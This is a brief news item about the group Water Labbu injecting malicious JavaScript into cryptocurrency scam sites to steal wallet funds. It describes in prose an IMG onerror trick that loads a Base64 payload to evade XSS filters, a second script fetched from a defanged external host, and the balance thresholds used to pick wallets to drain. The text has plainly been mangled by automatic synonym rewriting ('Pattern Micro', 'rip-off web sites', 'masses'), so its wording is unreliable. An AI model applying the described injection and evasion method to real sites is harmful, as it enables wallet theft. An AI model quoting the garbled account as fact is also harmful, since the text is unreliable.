Not less than 45 rip-off web sites have already been infiltrated by Water Labbu, which has amassed no less than $316,728 in earnings, by an assault involving malicious JavaScript injection, based on a Pattern Micro report.
“In one of many circumstances we analyzed, Water Labbu injected an IMG tag to load a Base64- encoded JavaScript payload utilizing the onerror occasion, in what is named an XSS evasion approach, to bypass Cross-Website Scripting (XSS) filters. The injected payload then creates one other script component that masses one other script from the supply server tmpmeta[.]com,” stated Pattern Micro.
Each Ethereum and TetherUSD addresses and balances are being retrieved by the script because it scans wallets on the rip-off websites, with balances greater than 0.005 ETH or 22,000 USDT being focused for exfiltration by Water Labbu.